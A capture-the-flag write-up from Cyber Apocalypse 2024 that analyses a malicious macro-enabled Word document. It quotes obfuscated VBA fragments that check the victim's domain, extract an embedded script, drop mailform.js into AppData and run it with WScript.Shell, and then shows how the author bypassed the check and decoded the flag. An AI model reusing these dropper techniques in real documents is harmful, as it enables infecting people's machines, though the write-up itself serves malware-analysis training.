Game Invitation Writeup
Cyber Apocalypse 2024
Solved by : thewhiteh4t
- Challenge talks about receiving a malicious
docm
file in email - We managed to solve the challenge using windows and MS Office 2016
- We inspected the
macros
in the document and here is a brief flow :- it checks for host domain and proceeds if it matches
chkDomain = "GAMEMASTERS.local" strUserDomain = Environ$("UserDomain") If chkDomain <> strUserDomain Then
- it checks for host domain and proceeds if it matches
- opens the current document as binary mode
Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW
- uses regex to match a set pattern
SwMbxtWpP = StrConv(CbkQJVeAG, vbUnicode) Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD Dim vTxAnSEFH Set vTxAnSEFH = CreateObject("vbscript.regexp") vTxAnSEFH.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa" Set I4j833DS5SFd34L3gwYQD = vTxAnSEFH.Execute(SwMbxtWpP)
- uses regex to match a set pattern
- gets
AppData
dir path and writesmailform.js
kWXlyKwVj = Environ("appdata") & "\Microsoft\Windows" Set aMUsvgOin = CreateObject("Scripting.FileSystemObject") If Not aMUsvgOin.FolderExists(kWXlyKwVj) Then kWXlyKwVj = Environ("appdata") End If Set aMUsvgOin = Nothing Dim K764B5Ph46Vh K764B5Ph46Vh = FreeFile IAiiymixt = kWXlyKwVj & "\" & "mailform.js"
- uses
wscript
to runmailform.js
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell") R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"
- Finally it runs clean up and deletes
mailform.js
- First we can modify the domain check to bypass that condition
chkDomain = "GAMEMASTERS.local" strUserDomain = Environ$("UserDomain") <-- original strUserDomain = "GAMEMASTERS.local" <-- simply replace it with the domain If chkDomain <> strUserDomain Then
- In the
mailform.js
file we can add one extra statement to print the output of the function just before it hitseval
as highlighted below :
- Now we can use
csript
which is a CMD alternative ofwscript
to read the output it will print :
- In the noise we can see a
cookie
being sent with a base64 string
> echo "SFRCe200bGQwY3NfNHIzX2czdHQxbmdfVHIxY2tpMTNyfQo=" | base64 -d
> HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}